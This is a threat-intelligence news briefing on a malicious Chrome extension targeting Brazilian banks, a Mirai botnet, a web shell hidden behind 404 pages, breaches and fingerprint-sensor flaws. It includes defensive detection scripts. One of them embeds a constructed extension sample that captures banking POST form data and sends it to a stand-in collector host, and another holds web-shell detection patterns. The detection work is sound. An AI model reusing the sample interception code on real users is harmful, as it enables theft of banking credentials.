Cyware Daily Threat Intelligence

Daily Threat Briefing • November 23, 2023
Banks in Brazil are once again in the crosshairs owing to a malicious Chrome extension known as ParaSiteSnatcher. Attackers are targeting Latin American users, particularly in Brazil, by abusing Chrome's extension APIs to intercept and exfiltrate sensitive data, including banking details. In another headline, Akamai laid bare the details of a Mirai-based DDoS botnet, a malware sample based on the hailBot Mirai variant, and a web shell. The botnet leverages a pair of (undisclosed) zero-day flaws in routers and Network Video Recorder (NVR) devices that still use default admin credentials.
Meanwhile, security researchers shared details of an exploit against the top fingerprint sensors used for Windows Hello authentication in laptops. The research involved extensive reverse engineering of both software and hardware, uncovering cryptographic implementation flaws, and understanding proprietary communication protocols.
Ransomware attack on direct debit collection firm
London & Zurich, a direct debit collection firm, experienced a ransomware attack causing severe disruptions that led to significant backlogs, affecting cash flow for businesses relying on it. The outage left customers unable to process direct debit payments, and customers could not even reach any support services via the company's phone lines. One managed service provider reported a backlog of over $124,000.
U.S. nuclear reactor lab hit
The Idaho National Laboratory (INL) suffered a data breach, exposing employee information, including addresses, SSNs, bank account details, names, and dates of birth. The breach impacted the Oracle HCM system servers supporting INL's Human Resources applications. The hacker group SiegedSec claimed responsibility, leaked the stolen data, and posted screenshots of internal INL tools.
Bar association members’ data compromised
The New York City Bar Association disclosed a cyberattack that occurred nearly a year ago, with data of over 27,000 members and employees compromised. An investigation revealed that hackers gained access to internal files between December 2 and December 24, 2022. The Cl0p ransomware gang claimed responsibility for the attack in January. Financial account details and payment card information, including security codes or PINs, were reportedly leaked.
LitterDrifter drifts further and beyond
The notorious Russian state-backed hacking group Gamaredon is expanding its victim reach with the LitterDrifter worm. The adversaries employ USB-based espionage malware for broad-scale data collection. The malware consists of two primary components, a spreading module and a C2 module, supporting a large-scale operation. LitterDrifter has infected organizations in Ukraine, the U.S., Vietnam, Chile, Poland, and Germany.
ParaSiteSnatcher: a malicious Chrome extension
Security researchers have discovered a sophisticated malicious Google Chrome extension named ParaSiteSnatcher. Designed to target users in Latin America, particularly Brazil, the extension allows threat actors to monitor, manipulate, and exfiltrate sensitive information, including data from Banco do Brasil and Caixa Econômica Federal. ParaSiteSnatcher abuses the Chrome extension API to intercept HTTP traffic and exfiltrate sensitive information, especially from POST requests containing account and financial details.
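The capability described above (reading POST bodies to banking sites from inside the browser and sending them elsewhere) is exactly what a reviewer should look for when triaging an unknown extension. The following is an added example, not ParaSiteSnatcher's code and not from the researchers' report: a small static triage script for Node.js that inspects an extension's manifest and background script for the documented Chrome extension API calls that make such interception possible. The sample manifest, the background script, the collector hostname `collector.invalid` and the `.com.br`/`.gov.br` domain heuristic are all constructed for this example.

```javascript
// Added example (not ParaSiteSnatcher's code): static triage of an unpacked
// Chrome extension for "read POST bodies, then send them out" capability.
// The manifest fields and webRequest listener names are the documented Chrome
// extension API; the sample inputs below are constructed for this example.

const BROAD_HOST_PATTERNS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

// Host match patterns live in `permissions` (Manifest V2) or `host_permissions` (V3).
function hostPatterns(manifest) {
  const all = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return all.filter(p => p === '<all_urls>' || p.includes('://'));
}

function manifestFindings(manifest) {
  const findings = [];
  const perms = new Set(manifest.permissions || []);
  if (perms.has('webRequest')) findings.push('webRequest: can observe every matching HTTP request');
  if (perms.has('webRequestBlocking')) findings.push('webRequestBlocking: can modify or cancel requests');
  if (hostPatterns(manifest).some(h => BROAD_HOST_PATTERNS.includes(h))) {
    findings.push('broad host permission: listeners apply to every site');
  }
  return findings;
}

// Looks in a background script for the listener + extraInfoSpec combination that
// exposes POST form data, the URL filters it is scoped to, and outbound fetch() sinks.
function sourceFindings(src) {
  const findings = [];
  const hooksBody = /webRequest\.onBeforeRequest\.addListener/.test(src) && /['"]requestBody['"]/.test(src);
  if (hooksBody) findings.push('onBeforeRequest + requestBody: reads POST bodies before they leave the browser');

  const filters = [...src.matchAll(/['"](\*:\/\/[^'"]+)['"]/g)].map(m => m[1]);
  // Heuristic for this example only: Brazilian bank/government domains in the request filter.
  const targets = filters.filter(u => /\.(com|gov)\.br\//.test(u));
  if (targets.length) findings.push(`request filter names Brazilian domains: ${targets.join(', ')}`);

  const sinks = [...src.matchAll(/fetch\(\s*['"](https?:\/\/[^'"\/]+)/g)].map(m => m[1]);
  for (const s of sinks) findings.push(`outbound fetch() to ${s}`);

  return { findings, hooksBody, sinks };
}

// Verdict: "high" only when the script both reads request bodies and ships data out.
function triageExtension(manifest, backgroundSrc) {
  const m = manifestFindings(manifest);
  const s = sourceFindings(backgroundSrc);
  const verdict = s.hooksBody && s.sinks.length > 0 ? 'high' : (m.length + s.findings.length > 0 ? 'medium' : 'low');
  return { verdict, findings: [...m, ...s.findings] };
}

// Constructed sample: what a body-stealing extension's package might look like.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'constructed-sample',
  permissions: ['webRequest', 'webRequestBlocking', 'storage', '<all_urls>'],
  background: { scripts: ['bg.js'] },
};

const SAMPLE_BACKGROUND = `
chrome.webRequest.onBeforeRequest.addListener(
  function (d) {
    if (d.method === 'POST' && d.requestBody && d.requestBody.formData) {
      fetch('https://collector.invalid/upload', { method: 'POST', body: JSON.stringify(d.requestBody.formData) });
    }
  },
  { urls: ['*://*.bb.com.br/*', '*://*.caixa.gov.br/*'] },
  ['requestBody']
);`;

const report = triageExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND);
console.log(report.verdict);
for (const f of report.findings) console.log(' -', f);
```

Run it with `node triage.js` against an unpacked extension's `manifest.json` and background script. The verdict deliberately requires both halves of the chain (a body-reading listener and an outbound sink); a `webRequest` permission alone is common in legitimate ad blockers and is reported as a finding, not a verdict.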
Zero-Day exploits fuel new DDoS attacks
A new Mirai-based DDoS botnet campaign has been discovered exploiting two zero-day vulnerabilities that enable remote code execution on vulnerable routers and video recorders. The botnet, InfectedSlurs, uses racial slurs in its command-and-control infrastructure. A separate malware sample related to the hailBot Mirai variant was also spotted in the wild. Security experts also revealed a web shell, wso-ng, that conceals its login interface behind a fake 404 error page.
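A web shell that hides behind a 404 page defeats scanners that stop at the status code. The check below is an added example, not wso-ng's code and not from Akamai's report: it parses raw HTTP responses and flags a 404 whose body carries things a genuine error page never needs, such as a password field, a POST form, a keyboard handler, or leaked server-side code. Both sample responses are constructed for this example; the detection strings are heuristics, not signatures of wso-ng.

```javascript
// Added example (not wso-ng's code): flag HTTP 404 responses whose body looks
// like a login surface. Sample responses below are constructed.

// Minimal parser for a raw HTTP/1.x response (status line, headers, body).
function parseHttpResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? '' : raw.slice(sep + 4);
  const lines = head.split('\r\n');
  const status = parseInt(lines[0].split(' ')[1], 10);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { status, headers, body };
}

// Returns the reasons a 404 response looks like a disguised login page (empty if clean).
function suspicious404(resp) {
  if (resp.status !== 404) return [];
  const b = resp.body;
  const reasons = [];
  if (/<input[^>]+type=["']?password/i.test(b)) reasons.push('password field in a 404 body');
  if (/<form\b[^>]*method=["']?post/i.test(b)) reasons.push('POST form on a 404 page');
  if (/addEventListener\(\s*['"]key(down|press|up)['"]/i.test(b)) reasons.push('keyboard handler on a 404 page');
  if (/<\?php|\beval\(|base64_decode\(/i.test(b)) reasons.push('server-side code fragment in a 404 body');
  return reasons;
}

function scanResponses(rawResponses) {
  return rawResponses.map(raw => {
    const resp = parseHttpResponse(raw);
    return { status: resp.status, reasons: suspicious404(resp) };
  });
}

// Constructed sample 1: a plain server-generated 404.
const GENUINE_404 =
  'HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n' +
  '<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1>' +
  '<p>The requested URL was not found on this server.</p></body></html>';

// Constructed sample 2: a 404 page that carries a hidden login form and key handler.
const DISGUISED_404 =
  'HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n' +
  '<html><body><h1>Not Found</h1>' +
  '<form method="post" style="display:none"><input type="password" name="pass"></form>' +
  '<script>document.addEventListener("keydown", function(e){ /* reveal form */ });</script>' +
  '</body></html>';

for (const r of scanResponses([GENUINE_404, DISGUISED_404])) {
  console.log(r.status, r.reasons.length ? r.reasons.join('; ') : 'clean');
}
```

Feed it the raw responses from a crawl of a suspect host; a hit is a reason to pull the file behind that URL, not proof of compromise, since some application frameworks legitimately render their 404 pages through a template that includes a search or login widget.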
Biometric flaws risk device security
Security researchers at Blackwing Intelligence have identified critical vulnerabilities affecting Windows Hello fingerprint authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops. The flaws, found in fingerprint sensors from Goodix, Synaptics, and ELAN, enabled attackers to bypass fingerprint authentication. Exploiting weaknesses in the "Match on Chip" (MoC) fingerprint sensors, the researchers found ways to mount Adversary-in-the-Middle (AitM) attacks between the host and the sensor, most directly against the ELAN sensor.